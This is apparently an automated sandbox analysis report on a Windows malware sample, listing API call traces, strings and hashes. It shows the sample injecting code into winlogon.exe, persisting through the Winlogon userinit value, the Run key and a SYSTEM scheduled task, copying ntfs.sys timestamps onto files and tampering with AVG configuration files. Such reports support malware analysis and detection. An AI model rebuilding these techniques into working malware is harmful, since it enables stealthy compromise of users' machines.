                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1779852708-820036962
                                                                                                                                                                                                            • Opcode ID: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                            • Instruction ID: f59e5f2c9003a6e204812eb1f8c7eb33969ee6ba3e941ca0e7e6302637e7b3a9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed4ffb2dba8d29d9f73b1762ba96064b0f1017704a5a4d581a31cc202295fe74
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9781346150E3C06FE7138B609C68B963FB49F57700F1A41EBE680EB1E3D26C4849C366
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?,?,00401BB5,00000000), ref: 00401039
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentThread.KERNEL32 ref: 00401E10
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E17
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetCurrentProcess.KERNEL32(00000020,0040104F,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E27
                                                                                                                                                                                                              • Part of subcall function 00401E00: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,0040104F,?,?,?,?,00401BB5,00000000), ref: 00401E2E
                                                                                                                                                                                                              • Part of subcall function 00401E00: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 00401E51
                                                                                                                                                                                                              • Part of subcall function 00401E00: AdjustTokenPrivileges.KERNELBASE(0040104F,00000000,00000001,00000000,00000000,00000000), ref: 00401E6B
                                                                                                                                                                                                              • Part of subcall function 00401E00: GetLastError.KERNEL32 ref: 00401E75
                                                                                                                                                                                                              • Part of subcall function 00401E00: FindCloseChangeNotification.KERNELBASE(0040104F), ref: 00401E86
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 00401060
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?,?,00401BB5,?), ref: 00401081
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 0040109A
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 004010A4
                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001), ref: 004010B8
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010C7
                                                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 004010D9
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004010E9
                                                                                                                                                                                                            • SetEndOfFile.KERNELBASE(00000000), ref: 004010F6
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401118
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000), ref: 00401129
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$ChangeCloseCurrentFindNotificationOpenProcessThread$AdjustConvertCreateErrorFreeHandleInfoInformationLastLocalLockLookupNamedPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 1779852708-820036962
                                                                                                                                                                                                            • Opcode ID: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction ID: 0b24c45107c0befc32dd0ff84bd5674d64e160e2b6de00103b139920790b26b7
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7cc5cccd17c4c8d75918ffee1feed7c0f8f1c7f1eda389b3bae9a3494e8b2a5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 874152B5600208BBE7209B94DD49FAF7BBDEB89741F144026FB04FA2D0D7B49941C7A8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNELBASE(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                            • GetVolumeInformationA.KERNELBASE(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                            • userinit, xrefs: 00402A38
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3547530944-2324515132
                                                                                                                                                                                                            • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                            • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                            • CreateProcessA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 2248944234-2746444292
                                                                                                                                                                                                            • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                            • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                            • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                            • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                            • CreateFileA.KERNELBASE(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                            • SetFileTime.KERNELBASE(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                            • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                            • API String ID: 1046229350-2760794270
                                                                                                                                                                                                            • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                            • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                            • PathFileExistsA.KERNELBASE(?), ref: 00401302
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                            • GetTempFileNameA.KERNELBASE(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                            • SetFileAttributesA.KERNELBASE(?,00000000), ref: 0040135C
                                                                                                                                                                                                            • DeleteFileA.KERNELBASE(?), ref: 00401369
                                                                                                                                                                                                            • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2787354276-0
                                                                                                                                                                                                            • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                            • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402468
                                                                                                                                                                                                            • MoveFileA.KERNEL32(?,?), ref: 0040252F
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileFolderMovePath
                                                                                                                                                                                                            • String ID: \AVG\AVG9\dfmcfg.dat$\AVG\AVG9\dfncfg.dat
                                                                                                                                                                                                            • API String ID: 1404575960-1083204512
                                                                                                                                                                                                            • Opcode ID: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                            • Instruction ID: 6a3b38723654ace9b65cd78b9e90850702c138762b68f8666c7e3f81cfb55a8f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6917f6e4da9773d44f84d015a9f77c9b7ba1530eaea60a7d0f67c0c1847faf1
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35215EB45042448FC719DF14EA98B92BBE1FB89300F1581B9DA88A73B2D6B0D944CF98
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(00000000), ref: 004021AC
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                            • String ID: v-@
                                                                                                                                                                                                            • API String ID: 3664257935-4190885519
                                                                                                                                                                                                            • Opcode ID: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                            • Instruction ID: 659d1c44b33988b11b994a6559d152e96ecfdb185b9268fc6ed29e1105b0769f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8aa73b41344c928b5a69aeafce1e5ea70d40f485a6ee08f666cda2b661d009f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34D05E76E01629CBCB21DF94A5052AEF730FB44731F0043AADE247338083351C118AD5
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035AE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035CE
                                                                                                                                                                                                            • memset.MSVCRT ref: 004035EE
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 004035F6
                                                                                                                                                                                                            • GetVersionExA.KERNEL32 ref: 00403611
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • Part of subcall function 004034C0: OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • Part of subcall function 004034C0: GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • Part of subcall function 004034C0: CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 00403655
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 0040366E
                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 004036CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 00403717
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,76A8DB30), ref: 0040371E
                                                                                                                                                                                                            • memset.MSVCRT ref: 00403736
                                                                                                                                                                                                            • _snwprintf.MSVCRT ref: 00403750
                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00403773
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 0040378A
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040379E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • \\?\globalroot\systemroot\system32\tasks\, xrefs: 00403597
                                                                                                                                                                                                            • <Actions , xrefs: 0040380A
                                                                                                                                                                                                            • 00-->, xrefs: 0040383F
                                                                                                                                                                                                            • <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> , xrefs: 00403574
                                                                                                                                                                                                            • task%d, xrefs: 0040365C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Filememset$Process$HeapTokenVersion_snwprintf$AdminAllocCloseCountCreateCurrentHandleInformationModuleNameOpenPointerSizeTickUser
                                                                                                                                                                                                            • String ID: <Principals> <Principal id="LocalSystem"> <UserId>S-1-5-18</UserId> <RunLevel>HighestAvailable</RunLevel> $00-->$<Actions $\\?\globalroot\systemroot\system32\tasks\$task%d
                                                                                                                                                                                                            • API String ID: 1601901853-1561668989
                                                                                                                                                                                                            • Opcode ID: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                            • Instruction ID: 3d176fac64e71e3d45e4d3c7787755692d466ba94461fa4e5093d4db6fcc502b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 47170db96ac08f3ff994b6dc4be5b54f882b4b5e8f7adbcab515d84ab27e34fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76D1E1B2504301ABD720DF64CC49F5B7BA8EFC8715F044A2AFA49B7291D774EA04CB99
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,76E95430,00000000,?), ref: 00401923
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                            • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000000.00000002.1332873326.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000000.00000002.1332873326.000000000045E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                            • String ID: D
                                                                                                                                                                                                            • API String ID: 3422789474-2746444292
                                                                                                                                                                                                            • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                            • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                              • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Sleep.KERNEL32(00000064,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                            • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,76A8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                            • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                            • memcpy.MSVCRT ref: 004017D8
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                            • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                            • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                            • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
